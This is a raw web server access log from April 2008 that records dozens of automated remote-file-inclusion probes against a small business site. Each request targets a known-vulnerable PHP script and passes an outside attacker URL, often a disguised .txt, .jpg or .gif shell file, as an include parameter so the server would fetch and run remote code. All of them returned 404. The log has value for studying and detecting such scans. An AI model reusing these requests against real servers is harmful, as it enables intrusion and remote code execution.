84.18.207.65 - - [01/Apr/2008:09:16:43 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
69.9.37.130 - - [01/Apr/2008:09:17:07 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.provolonebig.altervista.org/cmd/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.bsfadvisors.com"
69.9.37.130 - - [01/Apr/2008:09:17:07 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.provolonebig.altervista.org/cmd/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.bsfadvisors.com"
152.74.96.144 - - [01/Apr/2008:09:17:59 -0700] "GET /logs/access.log//mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
152.74.96.144 - - [01/Apr/2008:09:18:00 -0700] "GET //mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
152.74.96.144 - - [01/Apr/2008:09:18:00 -0700] "GET /logs//mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
84.18.207.65 - - [01/Apr/2008:09:18:04 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
208.79.239.236 - - [01/Apr/2008:09:18:45 -0700] "GET /logs//index.php?skin_file=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.bsfadvisors.com"
208.79.239.236 - - [01/Apr/2008:09:18:45 -0700] "GET //index.php?skin_file=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.bsfadvisors.com"
207.44.238.63 - - [01/Apr/2008:09:18:46 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
207.44.238.63 - - [01/Apr/2008:09:18:51 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
207.44.238.63 - - [01/Apr/2008:09:18:54 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
85.234.144.44 - - [01/Apr/2008:09:20:32 -0700] "GET /logs/index.php?body=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
85.234.144.44 - - [01/Apr/2008:09:20:32 -0700] "GET /index.php?body=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
77.221.130.3 - - [01/Apr/2008:09:20:32 -0700] "GET /logs/access.log//amember/plugins/payment/secpay/config.inc.php?config[root_dir]=http://discount-guns.com//modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
77.221.130.3 - - [01/Apr/2008:09:20:32 -0700] "GET /logs//amember/plugins/payment/secpay/config.inc.php?config[root_dir]=http://discount-guns.com//modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
207.44.238.63 - - [01/Apr/2008:09:21:03 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
207.44.238.63 - - [01/Apr/2008:09:21:03 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
207.44.238.63 - - [01/Apr/2008:09:21:04 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
88.60.102.67 - - [01/Apr/2008:09:25:36 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
88.60.102.67 - - [01/Apr/2008:09:25:36 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
62.163.141.54 - - [01/Apr/2008:09:25:57 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.atlant.ru/sms/img/images.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
85.234.144.44 - - [01/Apr/2008:09:26:57 -0700] "GET /logs/access_080101.log/index.php?body=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
85.234.144.44 - - [01/Apr/2008:09:26:58 -0700] "GET /index.php?body=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
85.234.144.44 - - [01/Apr/2008:09:26:58 -0700] "GET /logs/index.php?body=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
65.98.60.90 - - [01/Apr/2008:09:27:06 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
65.98.60.90 - - [01/Apr/2008:09:27:07 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
85.234.144.44 - - [01/Apr/2008:09:28:55 -0700] "GET /logs/access_071201.log/index.php?body=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
85.234.144.44 - - [01/Apr/2008:09:29:01 -0700] "GET /logs/access_071101.log/index.php?body=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
62.163.141.54 - - [01/Apr/2008:09:29:03 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.atlant.ru/sms/img/images.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
189.19.255.240 - - [01/Apr/2008:09:29:05 -0700] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
189.19.255.240 - - [01/Apr/2008:09:29:10 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
189.19.255.240 - - [01/Apr/2008:09:29:11 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
85.234.144.44 - - [01/Apr/2008:09:29:12 -0700] "GET /logs/access_080201.log/index.php?body=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
85.234.144.44 - - [01/Apr/2008:09:29:56 -0700] "GET /logs/access_080101.log/index.php?body=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
85.234.144.44 - - [01/Apr/2008:09:29:56 -0700] "GET /index.php?body=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
85.234.144.44 - - [01/Apr/2008:09:29:56 -0700] "GET /logs/index.php?body=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
217.148.95.154 - - [01/Apr/2008:09:31:06 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
217.148.95.154 - - [01/Apr/2008:09:31:07 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
72.29.81.87 - - [01/Apr/2008:09:31:52 -0700] "GET /middle.php?file=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
64.28.184.235 - - [01/Apr/2008:09:32:03 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
64.28.184.235 - - [01/Apr/2008:09:32:04 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
85.234.144.44 - - [01/Apr/2008:09:32:07 -0700] "GET /logs/access_080201.log/index.php?body=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
217.16.16.208 - - [01/Apr/2008:09:33:23 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
217.16.16.208 - - [01/Apr/2008:09:33:23 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
217.16.16.208 - - [01/Apr/2008:09:33:23 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
217.16.16.208 - - [01/Apr/2008:09:33:23 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
217.16.16.208 - - [01/Apr/2008:09:33:24 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.xdengue.xpg.com.br/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
217.16.16.208 - - [01/Apr/2008:09:33:25 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.xdengue.xpg.com.br/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
217.195.192.40 - - [01/Apr/2008:09:33:45 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
217.195.192.40 - - [01/Apr/2008:09:33:45 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
64.38.19.130 - - [01/Apr/2008:09:35:08 -0700] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
64.38.19.130 - - [01/Apr/2008:09:35:08 -0700] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
213.239.217.43 - - [01/Apr/2008:09:35:14 -0700] "GET /middle.php?file=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
64.84.20.85 - - [01/Apr/2008:09:36:18 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
64.84.20.85 - - [01/Apr/2008:09:36:18 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
64.84.20.85 - - [01/Apr/2008:09:36:18 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
193.189.74.29 - - [01/Apr/2008:09:36:19 -0700] "GET /logs/access.log/myevent.php?myevent_path=http://www.darkmindz.com/shell/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
193.189.74.29 - - [01/Apr/2008:09:36:19 -0700] "GET /myevent.php?myevent_path=http://www.darkmindz.com/shell/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
193.189.74.29 - - [01/Apr/2008:09:36:20 -0700] "GET /logs/myevent.php?myevent_path=http://www.darkmindz.com/shell/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
193.189.74.29 - - [01/Apr/2008:09:36:31 -0700] "GET /logs/access_080201.log/myevent.php?myevent_path=http://www.darkmindz.com/shell/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
89.97.211.97 - - [01/Apr/2008:09:36:40 -0700] "GET /%0312http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.bsfadvisors.com"
213.239.177.121 - - [01/Apr/2008:09:38:31 -0700] "GET /logs/access_080101.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
213.239.177.121 - - [01/Apr/2008:09:38:31 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
213.239.177.121 - - [01/Apr/2008:09:38:31 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
217.148.95.154 - - [01/Apr/2008:09:38:41 -0700] "GET /logs/access_080101.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
217.148.95.154 - - [01/Apr/2008:09:38:41 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
217.148.95.154 - - [01/Apr/2008:09:38:42 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.bsfadvisors.com"
72.29.81.87 - - [01/Apr/2008:09:38:59 -0700] "GET /logs/access.log/middle.php?file=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.81.87 - - [01/Apr/2008:09:38:59 -0700] "GET /logs/middle.php?file=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
64.38.19.130 - - [01/Apr/2008:09:39:38 -0700] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.julmy.org/genealogie/mouse.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
64.38.19.130 - - [01/Apr/2008:09:39:39 -0700] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.julmy.org/genealogie/mouse.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
64.185.237.35 - - [01/Apr/2008:09:40:00 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
64.185.237.35 - - [01/Apr/2008:09:40:00 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
84.18.207.65 - - [01/Apr/2008:09:40:36 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
84.18.207.65 - - [01/Apr/2008:09:40:36 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
74.205.57.211 - - [01/Apr/2008:09:41:08 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://hoypinoy.com/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.bsfadvisors.com"
74.205.57.211 - - [01/Apr/2008:09:41:08 -0700] "GET //Neos_Chronos/header.php?base_folder=http://hoypinoy.com/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.bsfadvisors.com"
217.16.16.208 - - [01/Apr/2008:09:41:56 -0700] "GET /logs/access_080101.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
217.16.16.208 - - [01/Apr/2008:09:41:56 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
217.16.16.208 - - [01/Apr/2008:09:41:56 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
217.16.16.208 - - [01/Apr/2008:09:42:03 -0700] "GET /logs/access_080101.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
217.16.16.208 - - [01/Apr/2008:09:42:04 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
217.16.16.208 - - [01/Apr/2008:09:42:04 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
213.239.217.43 - - [01/Apr/2008:09:42:46 -0700] "GET /logs/access.log/middle.php?file=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
213.239.217.43 - - [01/Apr/2008:09:42:47 -0700] "GET /logs/middle.php?file=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
85.119.240.143 - - [01/Apr/2008:09:45:35 -0700] "GET /logs/access.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
85.119.240.143 - - [01/Apr/2008:09:45:35 -0700] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
85.119.240.143 - - [01/Apr/2008:09:45:36 -0700] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
212.77.224.171 - - [01/Apr/2008:09:46:28 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://tompakovcapital.com/.dat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
216.73.103.57 - - [01/Apr/2008:09:47:10 -0700] "GET /logs/access.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.73.103.57 - - [01/Apr/2008:09:47:10 -0700] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.73.103.57 - - [01/Apr/2008:09:47:10 -0700] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.73.103.57 - - [01/Apr/2008:09:47:12 -0700] "GET /logs/access.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.73.103.57 - - [01/Apr/2008:09:47:12 -0700] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.73.103.57 - - [01/Apr/2008:09:47:12 -0700] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
89.97.211.97 - - [01/Apr/2008:09:47:35 -0700] "GET /enc/content.php?Home_Path=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.bsfadvisors.com"
89.97.211.97 - - [01/Apr/2008:09:47:35 -0700] "GET /logs/enc/content.php?Home_Path=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.bsfadvisors.com"
88.1.238.170 - - [01/Apr/2008:09:49:15 -0700] "GET /logs/access.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.varliktanveriler.com/guestbook/tmp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
88.1.238.170 - - [01/Apr/2008:09:49:19 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.varliktanveriler.com/guestbook/tmp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
80.67.27.166 - - [01/Apr/2008:09:49:36 -0700] "GET /%034administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=wwww.hotnews.altervista.org/cmd2.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
88.60.102.67 - - [01/Apr/2008:09:49:48 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
88.60.102.67 - - [01/Apr/2008:09:52:11 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
88.60.102.67 - - [01/Apr/2008:09:52:12 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
88.60.102.67 - - [01/Apr/2008:09:52:12 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
157.100.153.34 - - [01/Apr/2008:09:54:05 -0700] "GET /logs/access_080201.log//components/com_simpleboard/image_upload.php?sbp=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
157.100.153.34 - - [01/Apr/2008:09:54:05 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
157.100.153.34 - - [01/Apr/2008:09:54:06 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
85.234.144.44 - - [01/Apr/2008:09:55:50 -0700] "GET /logs/access.log/index.php?pageurl=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
85.234.144.44 - - [01/Apr/2008:09:55:50 -0700] "GET /index.php?pageurl=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
85.234.144.44 - - [01/Apr/2008:09:55:50 -0700] "GET /logs/index.php?pageurl=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
80.93.56.181 - - [01/Apr/2008:09:57:15 -0700] "GET /logs/access.log//atom.php5?page=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
